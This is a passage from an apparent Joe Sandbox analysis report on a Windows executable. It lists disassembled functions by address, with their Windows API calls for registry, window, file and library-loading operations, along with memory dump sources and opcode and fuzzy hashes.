                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Enum$CloseValue
                                      • String ID:
                                      • API String ID: 397863658-0
                                      • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                      • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                      • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                      • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                      Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID:
                                      • API String ID: 3356406503-0
                                      • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                      • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                      • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                      • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                      • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                      • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                      • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                      Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue
                                      • String ID:
                                      • API String ID: 2831762973-0
                                      • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                      • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                      • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                      • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                      Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00405393
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitialize
                                      • String ID:
                                      • API String ID: 2896919175-0
                                      • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                      • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                      • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                      • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                      Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$EnableShow
                                      • String ID:
                                      • API String ID: 1136574915-0
                                      • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                      • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                      • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                      • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                      Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                      • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                      • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                      • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                      Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                        • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                        • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                        • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                      • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                      • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                      • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                      Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                      Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                      • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                      • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                      Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                      • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                      • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                      Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                      • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                      • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                      • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                      Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWrite
                                      • String ID:
                                      • API String ID: 390214022-0
